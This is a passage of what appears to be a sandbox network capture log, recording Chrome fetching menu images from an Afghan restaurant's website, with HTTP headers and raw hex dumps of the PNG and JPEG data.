                                                                                                                                                    2024-10-01 04:26:50 UTC5292INData Raw: d2 40 a8 5e a9 ae 50 0a 2b 9b a7 d2 0a 78 f9 f4 25 ce 9e 5d a7 d2 56 ac 74 53 ba 81 64 78 9b cd f9 ff fc 67 3c f7 d8 3a 71 92 32 b0 33 4f 67 3e 21 58 57 14 47 6d 56 d6 ea d8 79 4d 2e af e9 1b dd ca d8 d0 2e 3e fd 87 ff 95 17 fe f4 14 7e 10 f1 a8 27 38 b4 c7 a0 32 b2 9b f3 2f 2c 70 7b ae 4d 66 64 84 24 4d b0 2c 81 95 75 a9 2e d7 71 48 d8 7a eb 56 9c bc 40 98 71 2f 7f 1f de 46 ab 99 50 5d df 40 f9 09 33 7b 9a dc 79 f8 56 3e 76 fe 65 c2 28 26 69 87 2c d6 66 d9 3b 7a 2f 66 2b 21 4a 63 a4 e8 35 38 45 69 82 14 06 20 49 e3 90 34 89 30 6d 8f 4e 18 60 90 4e b8 4e a6 0f a8 7e d3 11 6d 3a 90 29 e6 c6 9c 6c 89 38 11 a8 38 a2 6f 7a 1f a2 ef 00 d5 b5 26 52 2a c2 da 02 69 58 c5 ca 95 7b b5 d1 a4 84 9d 0e 61 6d 89 b4 5b e5 da 99 8b 3c f7 d8 09 8e 1f 9f e3 89 eb 0d 5e dc
                                                                                                                                                    Data Ascii: @^P+x%]VtSdxg<:q23Og>!XWGmVyM..>~'82/,p{Mfd$M,u.qHzV@q/FP]@3{yV>ve(&i,f;z/f+!Jc58Ei I40mN`NN~m:)l88oz&R*iX{am[<^


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                    91192.168.2.449856162.0.209.2394435428C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    2024-10-01 04:26:50 UTC657OUTGET /assets/imgs/menu_imges/Prawn_curry.png HTTP/1.1
                                                                                                                                                    Host: www.afghanhayatrestaurant.com.au
                                                                                                                                                    Connection: keep-alive
                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                    Sec-Fetch-Dest: image
                                                                                                                                                    Referer: https://www.afghanhayatrestaurant.com.au/dineInMenu
                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                    2024-10-01 04:26:50 UTC352INHTTP/1.1 200 OK
                                                                                                                                                    keep-alive: timeout=5, max=100
                                                                                                                                                    cache-control: public, max-age=604800
                                                                                                                                                    expires: Tue, 08 Oct 2024 04:26:50 GMT
                                                                                                                                                    content-type: image/png
                                                                                                                                                    last-modified: Wed, 27 Sep 2023 22:19:36 GMT
                                                                                                                                                    accept-ranges: bytes
                                                                                                                                                    content-length: 37258
                                                                                                                                                    date: Tue, 01 Oct 2024 04:26:50 GMT
                                                                                                                                                    server: LiteSpeed
                                                                                                                                                    x-turbo-charged-by: LiteSpeed
                                                                                                                                                    connection: close
                                                                                                                                                    2024-10-01 04:26:50 UTC16384INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 57 00 00 00 4b 08 06 00 00 00 05 dc 1b 8c 00 00 00 09 70 48 59 73 00 00 0b 13 00 00 0b 13 01 00 9a 9c 18 00 00 0a 4d 69 43 43 50 50 68 6f 74 6f 73 68 6f 70 20 49 43 43 20 70 72 6f 66 69 6c 65 00 00 78 da 9d 53 77 58 93 f7 16 3e df f7 65 0f 56 42 d8 f0 b1 97 6c 81 00 22 23 ac 08 c8 10 59 a2 10 92 00 61 84 10 12 40 c5 85 88 0a 56 14 15 11 9c 48 55 c4 82 d5 0a 48 9d 88 e2 a0 28 b8 67 41 8a 88 5a 8b 55 5c 38 ee 1f dc a7 b5 7d 7a ef ed ed fb d7 fb bc e7 9c e7 fc ce 79 cf 0f 80 11 12 26 91 e6 a2 6a 00 39 52 85 3c 3a d8 1f 8f 4f 48 c4 c9 bd 80 02 15 48 e0 04 20 10 e6 cb c2 67 05 c5 00 00 f0 03 79 78 7e 74 b0 3f fc 01 af 6f 00 02 00 70 d5 2e 24 12 c7 e1 ff 83 ba 50 26 57 00 20 91 00 e0 22 12 e7 0b 01 90 52
                                                                                                                                                    Data Ascii: PNGIHDRWKpHYsMiCCPPhotoshop ICC profilexSwX>eVBl"#Ya@VHUH(gAZU\8}zy&j9R<:OHH gyx~t?op.$P&W "R
                                                                                                                                                    2024-10-01 04:26:50 UTC8192INData Raw: 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                    Data Ascii:
                                                                                                                                                    2024-10-01 04:26:50 UTC12682INData Raw: 2d 71 fe ec 1c e2 0e 9b 7d 3b 76 f2 b6 d1 f7 f3 85 17 ff 82 17 2f fd 1c a3 7d 16 8b 8b 21 ef bf ed 1f b3 a9 e3 26 a6 2b 47 b1 64 86 a0 59 21 0a 1a 64 53 16 41 5d 91 29 0e 63 a7 f2 f8 de 22 69 c2 03 49 1c 52 f5 23 a4 14 ed f4 34 49 70 0c 13 61 18 6f 0e 6e 26 6d 5d 4b da 23 41 a9 a7 67 9b b0 25 89 af 91 52 62 38 29 84 25 91 31 a8 38 41 29 85 52 09 24 0a ad db c0 6a 95 10 7b 15 94 5f c5 20 c1 10 0a cb 5a 23 08 5b 54 16 1e 45 28 0f c3 e8 20 d1 36 52 d8 08 2b 4b d9 03 a5 02 94 65 f0 c5 47 8e b0 7a 29 c5 e8 b8 4b 6e 93 22 5a 4e 51 ad 79 94 86 3b 60 6d 85 e7 bf 74 89 b3 27 a7 29 9f aa c0 16 8f c5 64 14 75 79 2b b3 d3 b3 4c 57 5f a5 67 c4 c2 75 05 a5 d2 10 cb ab 75 66 e4 2c 3a 10 e8 16 4c cd 4c b1 eb e0 2d 5c 0e 67 d8 de b7 9f cf 3d f7 19 2e ad 35 71 cd 3c 0f 1c
                                                                                                                                                    Data Ascii: -q};v/}!&+GdY!dSA])c"iIR#4Ipaon&m]K#Ag%Rb8)%18A)R$j{_ Z#[TE( 6R+KeGz)Kn"ZNQy;`mt')duy+LW_guuf,:LL-\g=.5q<


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                    92192.168.2.449859162.0.209.2394435428C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    2024-10-01 04:26:50 UTC674OUTGET /assets/imgs/menu_imges/Marinated_Chicken_tenderloin.png HTTP/1.1
                                                                                                                                                    Host: www.afghanhayatrestaurant.com.au
                                                                                                                                                    Connection: keep-alive
                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                    Sec-Fetch-Dest: image
                                                                                                                                                    Referer: https://www.afghanhayatrestaurant.com.au/dineInMenu
                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                    2024-10-01 04:26:50 UTC352INHTTP/1.1 200 OK
                                                                                                                                                    keep-alive: timeout=5, max=100
                                                                                                                                                    cache-control: public, max-age=604800
                                                                                                                                                    expires: Tue, 08 Oct 2024 04:26:50 GMT
                                                                                                                                                    content-type: image/png
                                                                                                                                                    last-modified: Wed, 27 Sep 2023 22:14:24 GMT
                                                                                                                                                    accept-ranges: bytes
                                                                                                                                                    content-length: 37004
                                                                                                                                                    date: Tue, 01 Oct 2024 04:26:50 GMT
                                                                                                                                                    server: LiteSpeed
                                                                                                                                                    x-turbo-charged-by: LiteSpeed
                                                                                                                                                    connection: close
                                                                                                                                                    2024-10-01 04:26:50 UTC16384INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 57 00 00 00 4b 08 06 00 00 00 05 dc 1b 8c 00 00 00 09 70 48 59 73 00 00 0b 13 00 00 0b 13 01 00 9a 9c 18 00 00 0a 4d 69 43 43 50 50 68 6f 74 6f 73 68 6f 70 20 49 43 43 20 70 72 6f 66 69 6c 65 00 00 78 da 9d 53 77 58 93 f7 16 3e df f7 65 0f 56 42 d8 f0 b1 97 6c 81 00 22 23 ac 08 c8 10 59 a2 10 92 00 61 84 10 12 40 c5 85 88 0a 56 14 15 11 9c 48 55 c4 82 d5 0a 48 9d 88 e2 a0 28 b8 67 41 8a 88 5a 8b 55 5c 38 ee 1f dc a7 b5 7d 7a ef ed ed fb d7 fb bc e7 9c e7 fc ce 79 cf 0f 80 11 12 26 91 e6 a2 6a 00 39 52 85 3c 3a d8 1f 8f 4f 48 c4 c9 bd 80 02 15 48 e0 04 20 10 e6 cb c2 67 05 c5 00 00 f0 03 79 78 7e 74 b0 3f fc 01 af 6f 00 02 00 70 d5 2e 24 12 c7 e1 ff 83 ba 50 26 57 00 20 91 00 e0 22 12 e7 0b 01 90 52
                                                                                                                                                    Data Ascii: PNGIHDRWKpHYsMiCCPPhotoshop ICC profilexSwX>eVBl"#Ya@VHUH(gAZU\8}zy&j9R<:OHH gyx~t?op.$P&W "R
                                                                                                                                                    2024-10-01 04:26:50 UTC16384INData Raw: 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                    Data Ascii:
                                                                                                                                                    2024-10-01 04:26:50 UTC4236INData Raw: fa 8e 7b d1 c7 f6 12 b6 f6 e3 6c 9b 22 4d 90 3a 20 2a 07 4c de f6 4e 54 e9 77 79 f1 63 ff 1e e4 06 cd bb ee 25 5b 3d 4b 96 06 0c 3b 09 5a 81 d6 96 d8 cf 31 55 c1 96 85 24 11 cc 36 a6 50 1a cc 60 0d 1d ed 41 12 52 ac bd 88 17 57 11 a5 09 10 29 78 75 30 19 97 af 9c 64 66 7e 37 d3 87 5f cf ee fa 6d 2c f5 56 98 9b bd 8d c9 c6 6e 76 cd de ca 48 d6 19 bd 38 a0 56 39 0a 51 4c 5f b4 d0 77 fe 75 6a d3 bb c7 cd 2c ca c7 ba 71 18 06 02 e9 c0 d9 71 4c 2b b5 47 96 a7 54 b5 dc ef 07 fa e6 e0 16 a3 7c da f3 e2 79 1d 80 d4 e3 42 67 9c 44 c9 1c e9 65 08 59 46 54 5b a4 2b 3e d9 c6 4b 84 33 ef 20 4d 9a 58 23 91 c2 81 4b 11 9e a4 73 e9 19 d2 d5 af 30 7b ec 3e a2 5a 9d 68 fa 18 ba b4 6b 5c 40 ec 0a 50 01 61 eb 08 4e 57 18 ae 3d cf e6 f1 27 e9 2e 6e 63 02 88 27 17 98 b8 f5 03
                                                                                                                                                    Data Ascii: {l"M: *LNTwyc%[=K;Z1U$6P`ARW)xu0df~7_m,VnvH8V9QL_wuj,qqL+GT|yBgDeYFT[+>K3 MX#Ks0{>Zhk\@PaNW='.nc'


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                    93192.168.2.449861162.0.209.2394435428C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    2024-10-01 04:26:51 UTC643OUTGET /assets/imgs/res_menu.jpg HTTP/1.1
                                                                                                                                                    Host: www.afghanhayatrestaurant.com.au
                                                                                                                                                    Connection: keep-alive
                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                    Sec-Fetch-Dest: image
                                                                                                                                                    Referer: https://www.afghanhayatrestaurant.com.au/dineInMenu
                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                    2024-10-01 04:26:51 UTC354INHTTP/1.1 200 OK
                                                                                                                                                    keep-alive: timeout=5, max=100
                                                                                                                                                    cache-control: public, max-age=604800
                                                                                                                                                    expires: Tue, 08 Oct 2024 04:26:51 GMT
                                                                                                                                                    content-type: image/jpeg
                                                                                                                                                    last-modified: Wed, 05 Apr 2023 14:06:20 GMT
                                                                                                                                                    accept-ranges: bytes
                                                                                                                                                    content-length: 189380
                                                                                                                                                    date: Tue, 01 Oct 2024 04:26:51 GMT
                                                                                                                                                    server: LiteSpeed
                                                                                                                                                    x-turbo-charged-by: LiteSpeed
                                                                                                                                                    connection: close
                                                                                                                                                    2024-10-01 04:26:51 UTC16384INData Raw: ff d8 ff e1 34 5d 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 0c 01 00 00 03 00 00 00 01 04 cb 00 00 01 01 00 03 00 00 00 01 03 b5 00 00 01 02 00 03 00 00 00 03 00 00 00 9e 01 06 00 03 00 00 00 01 00 02 00 00 01 12 00 03 00 00 00 01 00 01 00 00 01 15 00 03 00 00 00 01 00 03 00 00 01 1a 00 05 00 00 00 01 00 00 00 a4 01 1b 00 05 00 00 00 01 00 00 00 ac 01 28 00 03 00 00 00 01 00 02 00 00 01 31 00 02 00 00 00 22 00 00 00 b4 01 32 00 02 00 00 00 14 00 00 00 d6 87 69 00 04 00 00 00 01 00 00 00 ec 00 00 01 24 00 08 00 08 00 08 00 0a fc 80 00 00 27 10 00 0a fc 80 00 00 27 10 41 64 6f 62 65 20 50 68 6f 74 6f 73 68 6f 70 20 43 43 20 32 30 31 35 20 28 57 69 6e 64 6f 77 73 29 00 32 30 32 32 3a 30 37 3a 32 36 20 31 35 3a 32 38 3a 34 32 00 00 00 00 04 90 00 00 07 00
                                                                                                                                                    Data Ascii: 4]ExifMM*(1"2i$''Adobe Photoshop CC 2015 (Windows)2022:07:26 15:28:42
                                                                                                                                                    2024-10-01 04:26:51 UTC8192INData Raw: eb 09 d5 df a4 df 67 e9 5c ef f4 9f 4f f7 d7 54 c0 d6 99 2d dd f3 23 f2 29 34 4e 91 fe d4 e3 a8 a4 02 41 7c db 17 ae f5 ae 9a 5f 46 2b da c6 b1 ee 71 a6 ea 83 f6 be 76 d8 cd ae db 6b 3e 87 e9 2a de 8d 81 d6 2d cb e9 6e a6 d7 3d 96 17 38 7a 74 bd c0 0f a4 e6 b2 bd d6 d6 d6 d2 df 6f f3 be af e8 ff 00 e1 57 57 d7 7e ae d3 d4 89 cb a0 36 be a0 d1 05 c7 da db 9a 38 65 ce fc cb 5b fe 0b 27 fe b7 7f e8 bf 9a e3 2b c4 2c cb b3 1e dc 4d f6 b9 d1 66 39 69 0e 0f aa 5e 5b b5 ad 73 9a f6 37 7e fb 36 7f 37 fc 84 c0 4c 4d 1d 8e c5 7d 71 6a 37 1b 84 f8 fd 67 23 a7 e2 bd e5 e6 dc da 5c db 71 a9 b1 fb 8d 81 80 be ca 5c ca 87 bd ad dc ff 00 d2 6e ff 00 83 af f9 15 7a 9f d6 bf ac e6 96 3c e4 b7 1b 20 9d c2 8c 61 b5 ac 1f 9d ea bd ee b1 d7 bf 67 f8 37 fb 2b 56 32 f1 5b d3 b1
                                                                                                                                                    Data Ascii: g\OT-#)4NA|_F+qvk>*-n=8ztoWW~68e['+,Mf9i^[s7~67LM}qj7g#\q\nz< ag7+V2[
                                                                                                                                                    2024-10-01 04:26:51 UTC16384INData Raw: db 6b 36 eb 6d c4 f5 6d 78 0e 77 93 9c 0b 8f ba 36 fb 3d 4a dd 5b 99 ec aa ca ff 00 c2 ef fc f5 8b d4 b1 5f 91 43 72 5b 93 45 19 57 54 fa 85 e7 8d ae 1e e6 7a 74 b7 d9 b9 8f 7f fd bc f5 a5 d7 b3 30 aa 60 c8 cb 25 95 32 a6 81 b5 c7 8b 3f 93 f9 bb 5c ea d9 63 ff 00 71 62 e4 1b da e3 6b 9a 59 55 7b 4b 5f 00 01 27 de 4f e7 d7 b7 f9 bd bb 7f 9a fd 26 f5 4b dd 9c 27 60 e9 75 7f bf 5c 3f f7 ed c8 e2 84 e0 6e f8 bb 76 bd 9c aa be af f5 3a a9 b6 ec 6c 86 b5 95 56 f7 df 63 1e 29 d9 5c 96 5b ea 3a c6 d7 6b 6a 7b 86 cf dc c9 fe 6e 9f 59 42 8c 2e 9c d6 ba d6 da 5c 59 b4 d6 2d 61 2f b5 ce 3b 9d b2 8d d6 50 da 2b 77 f3 b6 64 3f df fe 8f df e8 ad 6a a9 db d5 59 92 5e fb 6d 69 3b ab 80 5a fa b8 6d 2e b4 c3 6a 6b 59 ec a6 bd bf e0 bf 9c a5 02 d6 63 17 dd 6e d6 0c 67 b5 ed
                                                                                                                                                    Data Ascii: k6mmxw6=J[_Cr[EWTzt0`%2?\cqbkYU{K_'O&K'`u\?nv:lVc)\[:kj{nYB.\Y-a/;P+wd?jY^mi;Zm.jkYcng
                                                                                                                                                    2024-10-01 04:26:51 UTC16384INData Raw: e6 35 8f b7 bd 93 1e 8a 29 09 ee 76 3f 48 8e 58 e9 5c d0 94 9a 61 2a 71 52 de 1d d3 8e 62 d8 8c ee b9 e9 e3 c3 26 c6 e2 6c ce 97 17 2c f5 8e 19 f8 ef 48 b4 d1 f8 a4 de 85 e6 c5 5b 4b 4f 63 96 bd 69 57 ea ed 59 3d 92 56 71 67 2e e9 79 b7 54 af b6 c7 66 87 33 1c d3 0b 74 2c 69 24 81 99 a6 74 f5 77 dd 53 87 eb b8 bb 70 a9 9a da 3a 8a de 3a 3a 21 94 bd 28 b3 8a f7 88 64 d3 d5 a0 32 80 9a 82 47 e2 38 7a af a6 cf 96 16 00 cb 24 5c 03 10 76 1a 62 c5 d5 d2 76 e1 75 4e a2 25 be d4 65 75 55 11 c7 34 35 12 f8 c7 b3 65 6d 79 29 82 10 db f4 b4 17 f0 c6 b0 ac b2 df 29 d6 0c 72 af 50 97 ca ed 22 bd 7a 4c 4e 9e 55 82 35 c8 86 b6 e5 4a c7 d2 fa 54 73 7e 58 ff 00 4a 16 2a 9f ad 3b 4c bc ed ce 16 7a 2d 8a a3 21 c6 e0 ff 00 3f d9 69 95 fd 56 16 66 b4 39 58 c1 85 58 74 1b 79
                                                                                                                                                    Data Ascii: 5)v?HX\a*qRb&l,H[KOciWY=Vqg.yTf3t,i$twSp:::!(d2G8z$\vbvuN%euU45emy))rP"zLNU5JTs~XJ*;Lz-!?iVf9XXty
                                                                                                                                                    2024-10-01 04:26:51 UTC16384INData Raw: e0 1b 22 3a a8 0c 45 9e 3a 05 23 65 65 35 62 86 51 f6 0f d7 e8 de 8f b0 7a d4 7d 40 ad 24 13 33 33 80 49 13 ae 8f d8 c8 4b 44 63 31 58 83 99 cb 47 16 ea 40 9c e9 2d c2 32 b7 4a 30 3a 26 41 05 63 1d 74 ec d5 44 bb ce aa c5 fa f2 93 30 62 0c 51 bb e2 46 a8 58 13 8c be 21 2b 4f 26 47 c0 b8 44 5c 60 82 3e 4d 15 29 4a 82 11 f8 d0 96 de 12 4e 6d b0 8d 8f 14 d1 54 00 b0 00 92 70 36 8d 58 6c de b3 cf a3 0d 0a b2 30 50 e7 61 54 ea e4 64 98 d4 6a 51 0c b1 5c fc 9c ba ad 6e d7 66 c7 3f 8d d0 ea 48 6f 4d 44 f6 7d 97 a7 d6 5f 55 f6 c9 a0 93 a7 ee 15 69 5d ec 7b bd 85 b7 1f fa 07 66 13 ca ea 27 57 9e bf 63 40 e6 b3 59 f7 b0 da c5 91 81 49 0b 2e c8 cf 78 a4 90 a9 72 ef 04 a2 0b 1a 56 21 1c 32 ae a4 f1 27 14 12 2d f2 a0 9d a4 a7 d3 83 0b db d8 6b 67 23 81 ce 54 80 49 37
                                                                                                                                                    Data Ascii: ":E:#ee5bQz}@$33IKDc1XG@-2J0:&ActD0bQFX!+O&GD\`>M)JNmTp6Xl0PaTdjQ\nf?HoMD}_Ui]{f'Wc@YI.xrV!2'-kg#TI7
                                                                                                                                                    2024-10-01 04:26:51 UTC16384INData Raw: 8a 0b 1e c5 d0 30 54 91 82 25 15 11 53 b7 21 9d d8 ba 9e 7c 77 8d 78 22 ab 11 b1 db 8e 4b 1e 97 eb f1 d6 e4 7f a1 7b 27 fd 57 2c 2e f1 90 8c 1b cd 7d 2a 9c 65 de 24 7e 4d fc 23 52 36 cb e3 af 2c e5 f6 7a 7c 89 38 7f e9 5c fb 61 7a 3c e9 12 f7 b2 72 e9 27 4f fd 3a 24 37 7d db bb 6c cd d2 e8 ce 4b bb 1a d0 89 a4 65 28 eb f7 84 02 83 7b d7 dd 78 c9 32 b6 81 fc 85 18 00 79 fd 3e 85 07 e7 ff 00 a6 f6 2b e5 3e 97 ac 77 a1 9f d5 1a 60 78 fd 8a 12 57 f6 cb d1 1a bd aa 16 d2 d0 05 2d 74 a2 53 eb bd 9a 1c b9 e2 b6 65 97 97 4e 43 d2 f7 3e 87 f6 ed c9 19 0a d0 f3 c4 3c f0 b1 d7 e2 51 e6 df b7 dc f4 64 af cf 85 a4 55 0d 28 33 5a 8f a7 eb fd 88 2d 18 23 88 a4 5c fb cb 4e 69 e1 4e dc 97 52 58 24 f5 d7 4b eb d3 a5 27 0a c2 db 87 fa b1 75 e9 be 45 6d 1c 47 6b 59 df 94 49
                                                                                                                                                    Data Ascii: 0T%S!|wx"K{'W,.}*e$~M#R6,z|8\az<r'O:$7}lKe({x2y>+>w`xW-tSeNC><QdU(3Z-#\NiNRX$K'uEmGkYI
                                                                                                                                                    2024-10-01 04:26:51 UTC16384INData Raw: 8e 0b 16 38 54 52 da 44 ee 67 17 4c 70 51 8e 36 b0 f0 c5 4e 57 79 70 1b cb 58 5a 82 c3 40 d1 44 dd 09 92 dd 9e 58 45 95 0d b9 c4 75 7c 19 a3 bc c6 cf 3e fc af 05 1f 0c 96 aa 1c e7 c4 bf d9 8e 85 84 e9 f1 b8 d2 cd 3e f5 83 0f d0 7f b3 12 e8 76 ee a5 4a 36 67 7b 36 0a ec 7f 9f 75 1b a1 eb 96 63 f3 8f a2 64 7b 72 8f 28 ea 58 92 1b 1d 2a 46 ad 9f 16 39 5a 59 6b 4d 03 d8 fc 72 49 34 ee 96 bc 4c f2 b3 c9 22 43 2b 3d 72 19 63 d0 a3 60 42 2d 5a 42 ad 47 50 c7 33 19 0c ea 46 d0 aa b2 06 59 5f 4c 5d c8 71 b0 a3 f0 b1 d1 07 cb 16 4f 12 18 9c 0c 06 02 08 52 de 21 36 ba 70 09 2d 84 80 48 70 54 ef 08 62 00 1b 0b 5c e0 8c 09 19 55 48 8f 61 ab 2a 9a 50 15 c3 1a 01 4e f3 d7 5b 5c aa d2 c7 05 a7 89 a1 11 cb 24 76 a4 81 87 42 29 5a c2 c3 39 96 37 8f 23 1b 33 a7 db 48 42 29
                                                                                                                                                    Data Ascii: 8TRDgLpQ6NWypXZ@DXEu|>>vJ6g{6ucd{r(X*F9ZYkMrI4L"C+=rc`B-ZBGP3FY_L]qOR!6p-HpTb\UHa*PN[\$vB)Z97#3HB)
                                                                                                                                                    2024-10-01 04:26:51 UTC16384INData Raw: ea 38 5a e5 65 90 65 8e 2a 39 57 e9 35 14 6d 2a 50 90 a8 2c 4e 9e f6 aa 06 68 d8 34 80 32 9b 58 15 f0 f8 28 2a c6 40 b9 24 9e 1e 1e fe 8f e6 50 54 25 54 11 a5 49 bf b5 ee 51 28 02 31 27 98 1d 36 14 c9 1a 7e 23 70 ab ae e4 f1 03 b3 df f6 28 34 96 2c d9 80 30 bd 6a 24 02 2e 2e 30 b7 b2 b4 4c 44 e2 05 89 e8 ed 33 35 1d 71 ea 94 02 aa c3 0b df ab 27 cf a0 23 c6 45 c4 bf a4 f6 7d 8a 3a 99 6e c7 5d 97 aa 7c 54 0b 96 c4 dd 6c 73 d3 de a0 59 48 20 12 40 f1 1a 2b 6c 6e 08 b7 01 4c 4e 25 ac ad e9 1d 9a 26 e0 06 c8 8c ed 7a 58 96 e0 46 2c 84 e0 4f b5 5e 61 3f 66 a6 cc 6d 95 2e e3 6b 23 2b 8c 09 06 e1 87 69 65 57 eb a4 94 9e 64 cf f0 79 e5 0c f0 c8 79 f6 f3 1f dd ab 3f 5f 9f b1 fb 4a 4d 86 e6 07 46 53 f6 c5 15 65 82 62 7a cd e5 3f 23 f6 5e 2f d9 c9 1d 3c bb 40 21 be
                                                                                                                                                    Data Ascii: 8Zee*9W5m*P,Nh42X(*@$PT%TIQ(1'6~#p(4,0j$..0LD35q'#E}:n]|TlsYH @+lnLN%&zXF,O^a?fm.k#+ieWdyy?_JMFSebz?#^/<@!
                                                                                                                                                    2024-10-01 04:26:51 UTC16384INData Raw: d5 71 dd 6a 1b 9d b1 d3 22 e1 2c 44 f3 2b 77 5b f5 e8 a3 0a 37 17 89 bf c2 b5 21 2c 83 20 0f 30 f6 7f 52 96 52 6e 63 27 95 45 89 6f 17 72 83 3c 84 93 90 19 0a bc 64 3a 71 57 fa ad d8 ad 4d 75 60 2c f1 b7 d5 af 39 1b 94 9b 9e 39 f8 68 48 a7 53 65 96 54 55 00 0b d3 c6 86 e2 63 e5 ae 49 7c c9 f0 af 6e 8a a8 d3 19 39 71 35 6d 24 e9 c7 0a 69 2d f6 68 01 3f 94 da 88 02 fe 93 c2 ad 7c 7d 15 cd 73 56 38 0a 1b cd e2 ff 00 da a1 bc 71 9c 3c c2 bf f2 7f e2 50 24 00 a3 00 06 40 56 95 a1 2e e1 ba e7 44 51 8e b4 8f d9 8e 25 ef d3 ac ef 24 2a 03 17 d9 75 15 45 f9 7d b7 d1 a7 f6 94 8e c4 2b 8b 21 16 b2 81 ee 76 fc 74 0e d1 95 4b 00 aa 80 05 36 b6 9e c2 e8 d7 e3 a9 35 90 14 95 3a 2f 8f 2f 59 7e 65 4e 14 f9 71 6e 06 86 5e b3 05 d5 a9 57 cd 7e 74 f2 f9 53 5c 7f b4 8e ac bc
                                                                                                                                                    Data Ascii: qj",D+w[7!, 0RRnc'Eor<d:qWMu`,99hHSeTUcI|n9q5m$i-h?|}sV8q<P$@V.DQ%$*uE}+!vtK65://Y~eNqn^W~tS\
